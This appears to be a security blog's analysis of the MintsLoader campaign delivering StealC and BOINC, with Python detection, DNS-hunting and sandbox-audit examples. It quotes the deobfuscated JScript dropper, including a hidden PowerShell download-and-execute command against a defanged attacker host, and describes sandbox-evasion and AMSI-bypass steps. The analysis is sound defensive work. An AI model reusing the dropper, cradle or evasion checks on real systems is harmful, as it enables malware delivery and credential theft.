# MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks

## **Overview**

An ongoing campaign is using a malware loader called MintsLoader to distribute follow-on payloads, namely the StealC information stealer and the BOINC client.

According to the security company eSentire, the campaign mainly targets electricity, oil and gas, and legal services organizations in the United States and Europe.

## **Key Findings**

MintsLoader is a **malware loader**: its job is to fetch and run other malware on the victim's computer. Reported distribution channels include:

* **Fake websites or pirated software**
    
* **Phishing emails**
    
* **Malvertising**
    

The MintsLoader infection chain begins when a victim clicks a link in a spam email and downloads a JScript file whose name matches the pattern `Fattura[0-9]{8}.js` ("Fattura" is Italian for invoice, so the lure poses as an invoice with an eight-digit number).

![Figure 1 – JScript download](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-1-Victim-download.png align="center")

StealC is a type of **information-stealing malware**, designed to collect sensitive data from infected devices. It mainly targets **web browsers** and popular applications to steal:

* **Login information** (username, password)
    
* **Browser cookies** (to hijack logged-in sessions, which may remain valid even after the password is changed)
    
* **Autofill data** like credit card numbers, addresses
    
* **Cryptocurrency wallets** and bank account information
    
* **Clipboard data** (which may contain passwords or authentication codes)
    

BOINC (Berkeley Open Infrastructure for Network Computing) **is not malware**; it is a legitimate volunteer-computing client. In this campaign it is installed without consent and pointed at work the attackers profit from, so the victim's machine ends up mining cryptocurrency or running other unauthorized computation.

Figure 2 shows the obfuscated contents of the JScript file.

![Figure 2 – JScript obfuscated contents](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-2-Fattura-obfuscated.png align="left")

## **How attackers carry out the campaign**

1. First the attacker tricks the victim into downloading a malicious file from an untrusted source, here via an email link. In this campaign the file is named `Fattura[0-9]{8}.js`; a `.js` file is opened by Windows Script Host by default when double-clicked, so the victim never sees a script editor, only a brief flicker at most.
    
2. The JScript runs under **Windows Script Host (WSH)**. Once deobfuscated (Figure 3) it does only three things: wait, launch a PowerShell one-liner that downloads and executes the next stage from a web address, and delete itself from the victim's disk.
    
    ![Figure 3 - Deobfuscated JScript contents](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-3-Deobfuscated-JScript-contents.png align="left")
    
    2.1 `WScript.Sleep(13000);`:
    
    * Pauses the script for 13 seconds (the argument is in milliseconds). A short delay before doing anything malicious is a cheap way to outlast sandboxes that only observe a sample for a fixed time, and it also separates the script launch from the suspicious PowerShell child process in endpoint telemetry.
        
    
    2.2 `var shell = WScript.CreateObject("WScript.Shell");`:
    
    * Creates a **WScript.Shell** object, which lets the script run arbitrary system commands such as launching programs.
        
    
    2.3 `shell.Run("powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c \"curl -useb 'http://mubuzb3vwv[.]top/1.php?s=nints13' | iex\"");`:
    
    * `shell.Run()`: runs a command line; here it starts a new PowerShell process. Because `Run` is called without the wait flag it returns immediately, which is what lets the script delete itself in step 2.5 while PowerShell is still running. On the endpoint this appears as `powershell.exe` whose parent is `wscript.exe`, a parent/child pair that is rarely legitimate and worth alerting on.
        
    * `powershell -noprofile -executionpolicy bypass`: starts PowerShell without loading the user profile and with the execution policy set to Bypass. The execution policy is not a security boundary: it only decides whether script files may run, and any process can override it on the command line exactly like this.
        
    * `-WindowStyle hidden`: no console window is shown, so the user sees nothing.
        
    * `curl -useb 'http://mubuzb3vwv[.]top/1.php?s=nints13' | iex`:
        
        * `curl`: inside Windows PowerShell 5.1 this is not the curl binary but the built-in alias for `Invoke-WebRequest` (PowerShell 7 dropped the alias). `-useb` is the abbreviated `-UseBasicParsing` switch, accepted because PowerShell resolves any unambiguous prefix of a parameter name; it stops the cmdlet from trying to parse the response with Internet Explorer's HTML engine.
            
        * The URL is the first-stage server. The response body is **piped** (`|`) into `iex`, the alias for `Invoke-Expression`, so the downloaded PowerShell runs directly in memory and is never written to disk. That is what makes this "download cradle" pattern so common, and why PowerShell Script Block Logging, which records code as it is executed, is the place to look for it.
            
    
    2.4 `var filesystemobj = WScript.CreateObject("Scripting.FileSystemObject");`:
    
    * Creates a **FileSystemObject**, which gives the script file-system access (create, delete, copy files).
        
    
    2.5 `filesystemobj.DeleteFile(WScript.ScriptFullName);`:
    
    * Deletes the running script itself. `WScript.ScriptFullName` returns the full path of the current script, so as soon as PowerShell has been launched the dropper removes its own file and the lure disappears from the Downloads folder. The order matters: launch the next stage first, then delete the evidence.
        
3. The downloaded PowerShell then runs further obfuscated stages (Figures 4 and 5) that:
    
    * **Download and execute additional code** from the command-and-control (C2) server.
        
    * **Deploy StealC or the BOINC client** to steal information or consume system resources.
        
    * **Give the attacker remote access**, since every stage is fetched from and reports back to the C2, through which more payloads can be pushed.
        
    * **Evade detection** by obfuscating each PowerShell stage so that string-based signatures do not match the code on the wire.
        
    
    ![Figure 4 – Obfuscated first stage](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-4-%E2%80%93-Obfuscated-first-stage.png align="center")
    
    ![Figure 5 – Obfuscated next stage](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-5-%E2%80%93-Obfuscated-next-stage.png align="center")
    
4. The loader then fingerprints the host with PowerShell to detect virtual machines and analysis sandboxes (anti-VM / anti-analysis). The figures below show three checks: the `IsVirtualMachine` property reported by `Get-MpComputerStatus` (the Windows Defender status cmdlet), the `AdapterDACType` of the `Win32_VideoController` WMI class, and the `Win32_CacheMemory` WMI class. Hypervisors tend to report values (or no instances at all) for the last two that physical hardware does not, so each is a cheap VM tell; a sandbox that does not mask them never sees the later stages.
    
    ![Figure 6 – Check if virtual machine via Get-MpComputerStatus](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-6-%E2%80%93-Check-if-virtual-machine-via-Get-MpComputerStatus.png align="left")
    
    ![Figure 7 – Check if virtual machine via Win32_VideoController object AdapterDACType](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-7-%E2%80%93-Check-if-virtual-machine-via-Win32_VideoController-object-AdapterDACType.png align="left")
    
    ![Figure 8 – Check if virtual machine via Win32_CacheMemory](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-8-%E2%80%93-Check-if-virtual-machine-via-Win32_CacheMemory.png align="left")
    
5. Once the environment checks pass, the loader **builds its C2 domain at runtime with a domain generation algorithm (DGA)** instead of embedding a fixed one, so blocklisting a single domain does not stop it. Figure 11 lists known DGA domains; Figure 10 shows the request to the generated C2 and the execution of its response.
    
    ![Figure 11 – Known DGA domains](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-11-%E2%80%93-Known-DGA-domains.png align="center")
    
    ![Figure 10 – Send request to C2 and invoke response](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-10-%E2%80%93-Send-request-to-C2-and-invoke-response.png align="left")
    
    * `$c2` starts as an empty string
        
    * Letters chosen from the alphabet are appended to build the host label
        
    * `.top` is appended to complete the C2 domain name
        
    
    The letters cannot be chosen truly at random: the operator must be able to compute the same name in advance in order to register it, so the choice is derived from a seed both sides share, which is also what lets defenders pre-compute and sinkhole the domains once the algorithm is known.
        
6. The next stage (Figure 12) is a short script that:
    
    * **Pauses** with `sleep` before acting, to outlast short sandbox runs.
        
    * **Bypasses AMSI** (the Antimalware Scan Interface), so that Windows Defender and any other AMSI consumer does not get to scan the script content PowerShell is about to run.
        
    * **Downloads the executable** `aa.exe` from the file-sharing site `temp[.]sh`.
        
    * **Runs** `aa.exe`, which is the StealC payload.
        
    
    ![Figure 12 – Final stage, download/execute StealC](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-12-%E2%80%93-Final-stage-downloadexecute-StealC.png align="left")
    
7. `aa.exe` is the StealC stealer. Before doing anything else it fingerprints the host (compiled C, shown decompiled in the figures below). If any check fails it calls `ExitProcess(0)` and quits quietly, so an analyst sees a program that does nothing. Figure 16 shows the first check: the current username is compared with `JohnDoe`, the username that Microsoft Defender's antivirus emulator presents to the code it runs.
    
    ![Figure 16 – StealC username check for JohnDoe](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-16-Username-check-JohnDoe.png align="center")
    
8. StealC then checks the system language (Figure 17) and exits if it is Russian, Ukrainian, Belarusian, Kazakh or Uzbek, that is, on machines in Russia, Ukraine, Belarus, Kazakhstan and Uzbekistan. Refusing to infect hosts in those countries is a common rule in malware sold on Russian-language markets, usually explained as the operators avoiding prosecution at home.
    
    ![Figure 17 – StealC check for banned countries](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-17-Lang-check.png align="center")
    
9. Besides the username and language, StealC checks hardware resources (Figures 18 and 19): if the machine reports **fewer than 2 processors**, or **less than 1111 MB** of RAM, it exits via `ExitProcess(0)`. Analysis sandboxes are often provisioned with a single CPU and 1 GB of memory to save resources, so these thresholds discard them while real user machines pass.
    
    ![Figure 18 – StealC processors check](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-18-Processors-check.png align="center")
    
    ![Figure 19 – StealC memory check](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-19-Memory-check.png align="center")
    
10. After the checks pass, **StealC starts stealing**:
    
    * **Usernames and passwords** saved in browsers
        
    * **Browser cookies** (usable to hijack logged-in accounts)
        
    * **Autofill data** such as bank card details and addresses
        
    * **Cryptocurrency wallets** from wallet software
        
    * **Clipboard contents** (which may hold passwords or one-time codes)
        
    
    Once collected, everything is sent to the **attacker's C2 server**. By the time an infection is noticed the data is already gone, so resetting the harvested credentials and sessions is part of the response, not an optional extra.
    
11. Immediately afterwards the **BOINC client** is deployed. The attackers abuse it to consume the victim's computing resources, for example:
    
    * **Cryptocurrency mining** on the victim's CPU/GPU without their knowledge.
        
    * **Running computation for attacker-controlled projects** for profit.
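
The chain in steps 1 to 3 and 6 has a very recognizable shape in endpoint telemetry: `wscript.exe` starting a hidden `powershell.exe` whose command line fetches a URL and pipes it into `iex`. The following Python is an added example of a detection over process-creation events, written for this page and not taken from eSentire's report or tooling. The three sample events are constructed (the C2 host uses the reserved `.invalid` TLD) and the field names mirror Sysmon Event ID 1; the `Fattura` lure name and the cradle shape come from the page.

```python
import re
from typing import Optional

# Constructed sample records in the shape of Sysmon Event ID 1 (process creation)
# fields. They are made up for this example, not telemetry from the eSentire
# report; the C2 host uses the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {   # the MintsLoader pattern: WSH launches a hidden PowerShell download cradle
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "ParentCommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\u\Downloads\Fattura12345678.js"',
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -noprofile -executionpolicy bypass -WindowStyle hidden "
                       "-c \"curl -useb 'http://example-c2.invalid/1.php?s=x' | iex\"",
    },
    {   # benign: an admin script started from Explorer; bypass alone is not enough to alert
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # script-host parent but no download cradle: lower severity, still worth a look
        "ParentImage": r"C:\Windows\System32\cscript.exe",
        "ParentCommandLine": r"cscript.exe C:\logon\inventory.vbs",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -c Get-ComputerInfo",
    },
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# a web fetch (cmdlet, method or alias) followed later on the line by Invoke-Expression / iex
CRADLE_RE = re.compile(
    r"\b(curl|iwr|wget|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b"
    r".*?(\biex\b|Invoke-Expression)",
    re.IGNORECASE,
)
EXEC_BYPASS_RE = re.compile(r"-e[a-z]*\s+bypass", re.IGNORECASE)  # -ep / -exec / -executionpolicy
HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden", re.IGNORECASE)       # -w / -win / -windowstyle
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
LURE_RE = re.compile(r"Fattura\d{8}\.js", re.IGNORECASE)          # this campaign's lure file name


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def defang(url: str) -> str:
    """Rewrite a URL so it is not clickable when pasted into a ticket."""
    scheme, _, rest = url.partition("://")
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def analyze_event(event: dict) -> Optional[dict]:
    """Return a finding for a suspicious PowerShell launch, or None."""
    if basename(event.get("Image", "")) not in POWERSHELL:
        return None
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    from_script_host = parent in SCRIPT_HOSTS
    cradle = CRADLE_RE.search(cmd) is not None
    if not (from_script_host or cradle):
        return None  # -ep bypass / -w hidden on their own are too common in admin tooling
    bypass = EXEC_BYPASS_RE.search(cmd) is not None
    hidden = HIDDEN_RE.search(cmd) is not None
    reasons = []
    if from_script_host:
        reasons.append(f"powershell spawned by script host {parent}")
    if cradle:
        reasons.append("download cradle: web fetch piped into Invoke-Expression")
    if bypass:
        reasons.append("execution policy bypass")
    if hidden:
        reasons.append("hidden window")
    lure = LURE_RE.search(event.get("ParentCommandLine", ""))
    return {
        "severity": "high" if cradle and (from_script_host or (bypass and hidden)) else "medium",
        "reasons": reasons,
        "urls": [defang(u) for u in URL_RE.findall(cmd)],
        "lure_filename": lure.group(0) if lure else None,
    }


def scan(events: list) -> list:
    """Run analyze_event over a batch and tag each finding with its event index."""
    findings = []
    for idx, event in enumerate(events):
        finding = analyze_event(event)
        if finding is not None:
            finding["event_index"] = idx
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["event_index"], f["reasons"], f["urls"], f["lure_filename"])
```

Run against the constructed events, the loader's launch is reported as high severity with the lure file name and the defanged first-stage URL, the Explorer-launched backup script is ignored even though it also uses `-ExecutionPolicy Bypass`, and the `cscript.exe` parent without a cradle comes back as medium. The parent/child check is the part that survives obfuscation of the command line itself; the cradle regex only catches the unobfuscated forms, so pair it with Script Block Logging (Event ID 4104), which records the code after PowerShell has decoded it.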
        

## **IOC**

[iocs/MintsLoader/MintsLoader\_Stealc\_01\_14\_2025.txt at main · eSentire/iocs · GitHub](https://github.com/eSentire/iocs/blob/main/MintsLoader/MintsLoader_Stealc_01_14_2025.txt)
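
Because the loader's C2 names are generated rather than fixed, the domains in the IOC file go stale quickly. The Python below is an added example, not from the page or eSentire, of a heuristic hunt over DNS logs for the shape step 5 describes (letter-soup labels under `.top`, several of them per client): it scores labels by length, Shannon entropy and vowel ratio and reports clients that looked up at least a few such names. The log lines are constructed; `mubuzb3vwv.top` is the first-stage domain quoted above, the other `.top` names are invented and are not real indicators.

```python
import math
from collections import Counter, defaultdict

# Constructed DNS query log: timestamp, client, query name, type, response code.
# Made up for this example; mubuzb3vwv.top is the first-stage domain quoted on
# this page, the other .top names are invented random-letter labels, not real IOCs.
SAMPLE_DNS_LOG = """\
2025-01-14T10:00:01Z 10.0.0.5 kqzvbxwtpl.top A NXDOMAIN
2025-01-14T10:00:01Z 10.0.0.5 xjqmwvhtrz.top A NXDOMAIN
2025-01-14T10:00:02Z 10.0.0.5 vbnrtkqwsz.top A NXDOMAIN
2025-01-14T10:00:02Z 10.0.0.5 mubuzb3vwv.top A NOERROR
2025-01-14T10:00:03Z 10.0.0.5 www.esentire.com A NOERROR
2025-01-14T10:00:03Z 10.0.0.7 www.microsoft.com A NOERROR
2025-01-14T10:00:04Z 10.0.0.7 example.top A NOERROR
"""
VOWELS = set("aeiou")


def shannon_entropy(s: str) -> float:
    """Bits per character: 0 for a constant string, log2(len) when every character differs."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def vowel_ratio(s: str) -> float:
    return sum(ch in VOWELS for ch in s) / len(s) if s else 0.0


def looks_generated(label: str, min_len: int = 8, min_entropy: float = 2.5,
                    max_vowel_ratio: float = 0.3) -> bool:
    """Heuristic for letter-soup DGA labels: long, high-entropy and vowel-poor.
    The defaults are tuned so ordinary brand names (microsoft, cloudflare, esentire) pass."""
    label = label.lower()
    return (len(label) >= min_len
            and shannon_entropy(label) >= min_entropy
            and vowel_ratio(label) <= max_vowel_ratio)


def registrable(qname: str) -> str:
    """Last two labels of the name. Adequate for a single-label TLD such as .top;
    a real deployment would consult the public-suffix list instead."""
    parts = qname.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def find_dga_clients(log_text: str, tld: str = ".top", min_domains: int = 3) -> dict:
    """Map client -> sorted DGA-looking domains under `tld`, keeping only clients
    that queried at least `min_domains` distinct such names (the aggregate is the signal)."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue
        _ts, client, qname, _qtype, _rcode = fields
        domain = registrable(qname)
        if domain.endswith(tld) and looks_generated(domain[: -len(tld)]):
            seen[client].add(domain)
    return {client: sorted(domains) for client, domains in seen.items() if len(domains) >= min_domains}


if __name__ == "__main__":
    for client, domains in find_dga_clients(SAMPLE_DNS_LOG).items():
        print(client, "->", ", ".join(domains))
```

The thresholds are a triage aid, not a verdict: a single odd-looking name proves nothing, while one client resolving several never-before-seen `.top` names in a short window, most of them NXDOMAIN, is the DGA signature. Confirm against the response-code column and the published IOC list before blocking, and raise `min_domains` on networks where short `.top` labels are common.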

## **Recommendations**

* **Do not download software from unknown sources**, especially cracked software or pirated games.
    
* **Do not open suspicious emails, attachments or links**, even if they appear to come from a legitimate organization; an unexpected "invoice" that arrives as a script file (`Fattura....js`) is a red flag in itself.
    
* **Keep software and operating systems updated** to close known vulnerabilities.
    
* **Neutralize script lures where you can**: on machines that do not need Windows Script Host, disable it (set the `Enabled` value under `HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings` to `0`), or change the default handler for `.js`, `.jse`, `.vbs` and `.wsf` files to Notepad so that a double-click displays the file instead of running it.
    
* **Log and alert on PowerShell**: enable Script Block Logging (Event ID 4104), which records each stage after PowerShell has deobfuscated it, and alert on `powershell.exe` spawned by `wscript.exe` or `cscript.exe` and on command lines that pipe a web download into `iex`.
    
* **Tune analysis sandboxes** so the checks in steps 4 and 7 to 9 do not discard them: at least 2 CPUs, more than 1111 MB of RAM, a realistic username rather than `JohnDoe`, and masked hypervisor tells in WMI.
    
* **Check for unfamiliar processes**; if you find BOINC or other software you did not install, investigate immediately.
    
* **Use endpoint protection** capable of detecting loaders like MintsLoader, and feed it the published IOCs.
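
Steps 4 and 7 to 9 are exactly the checks that make a sample "do nothing" in an analysis sandbox. The Python below is an added example of auditing a sandbox's profile against them; it is written for this page and is not eSentire's or the page's code. The StealC thresholds (username `JohnDoe`, the five banned languages, fewer than 2 CPUs, under 1111 MB of RAM) and the `Get-MpComputerStatus` check come from the page; the LANGID-style language comparison, the `n/a` DAC type and the empty `Win32_CacheMemory` result are assumptions, marked as such in the code, and the three host profiles are constructed.

```python
# Windows primary language IDs (LANGID & 0x3FF) for the locales StealC refuses to
# run on, per the page. Assumption: the stealer compares a LANGID such as the one
# returned by GetUserDefaultLangID(); the page does not show which API it calls.
BANNED_PRIMARY_LANGS = {
    0x19: "Russian", 0x22: "Ukrainian", 0x23: "Belarusian", 0x3F: "Kazakh", 0x43: "Uzbek",
}
MIN_CPUS = 2                  # StealC exits below this (page: "fewer than 2 CPUs")
MIN_RAM_MB = 1111             # StealC exits below this (page: "less than 1111 MB")
SANDBOX_USERNAME = "JohnDoe"  # the username Microsoft Defender's AV emulator presents


def audit(profile: dict) -> list:
    """Return the names of every check that would make the loader or StealC quit
    on a host with this profile. An empty list means the sample would detonate."""
    failed = []
    # MintsLoader PowerShell checks (step 4). IsVirtualMachine is a plain boolean;
    # the values compared for the other two are not shown on the page, so treating
    # an 'n/a' DAC type and an empty Win32_CacheMemory result as tells is an assumption.
    if profile.get("mp_is_virtual_machine", False):
        failed.append("Get-MpComputerStatus.IsVirtualMachine")
    if profile.get("adapter_dac_type", "").strip().lower() in ("", "n/a"):  # assumption
        failed.append("Win32_VideoController.AdapterDACType")
    if profile.get("cache_memory_instances", 0) == 0:                        # assumption
        failed.append("Win32_CacheMemory")
    # StealC checks (steps 7 to 9)
    if profile.get("username", "").lower() == SANDBOX_USERNAME.lower():
        failed.append("username JohnDoe")
    primary = profile.get("lang_id", 0) & 0x3FF   # drop the sub-language bits
    if primary in BANNED_PRIMARY_LANGS:
        failed.append(f"banned language {BANNED_PRIMARY_LANGS[primary]}")
    if profile.get("cpu_count", 0) < MIN_CPUS:
        failed.append(f"cpu_count < {MIN_CPUS}")
    if profile.get("ram_mb", 0) < MIN_RAM_MB:
        failed.append(f"ram_mb < {MIN_RAM_MB}")
    return failed


def would_detonate(profile: dict) -> bool:
    return not audit(profile)


# Constructed host profiles, in the shape of what a sandbox operator would collect
# with Get-MpComputerStatus, Get-CimInstance and whoami; they are not real machines.
DEFAULT_SANDBOX = {   # a stock analysis VM: fails six of the seven checks
    "username": "JohnDoe", "lang_id": 0x0409, "cpu_count": 1, "ram_mb": 1024,
    "mp_is_virtual_machine": True, "adapter_dac_type": "n/a", "cache_memory_instances": 0,
}
HARDENED_SANDBOX = {  # resized, renamed and masked so every check passes; Italian locale to match the lure
    "username": "m.rossi", "lang_id": 0x0410, "cpu_count": 4, "ram_mb": 8192,
    "mp_is_virtual_machine": False, "adapter_dac_type": "Integrated RAMDAC", "cache_memory_instances": 3,
}
UZBEK_HOST = {**HARDENED_SANDBOX, "lang_id": 0x0843}  # realistic host with a Cyrillic Uzbek locale: StealC exits


if __name__ == "__main__":
    for name, profile in [("default sandbox", DEFAULT_SANDBOX),
                          ("hardened sandbox", HARDENED_SANDBOX),
                          ("Uzbek host", UZBEK_HOST)]:
        verdict = "detonates" if would_detonate(profile) else "exits on " + ", ".join(audit(profile))
        print(f"{name}: {verdict}")
```

The point of the audit is the contrast between the first two profiles: the stock VM fails on resources, username and hypervisor tells alone, without any hooking or debugger present, while the resized and renamed one reaches the stealing stage. The Uzbek profile shows why the language check is done on the primary language bits: both the Latin (0x0443) and Cyrillic (0x0843) Uzbek locales share primary ID 0x43, so either trips the check.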
    

## **Conclusion**

The MintsLoader campaign targets organizations in the US and Europe and is distributed mainly through spam emails linking to JScript files, or via ClickFix / KongTuke (fake "fix it" prompts on compromised websites that get the victim to paste a command). Combined with an information stealer like StealC, it is a direct threat to the confidentiality of credentials and other sensitive data.

**MintsLoader is a capable loader** that in this campaign delivers **StealC (credential and data theft) and BOINC (resource abuse)** without the victim's consent. If you suspect a system is infected, isolate it, preserve the PowerShell logs and compare them with the IOCs above, remove the loader and its payloads, and reset the credentials and sessions StealC could have harvested, since by the time the infection is noticed the stolen data is already on the attacker's server.

## **References**

1. [MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks](https://thehackernews.com/2025/01/mintsloader-delivers-stealc-malware-and.html)
    
2. [eSentire | MintsLoader: StealC and BOINC Delivery](https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery)
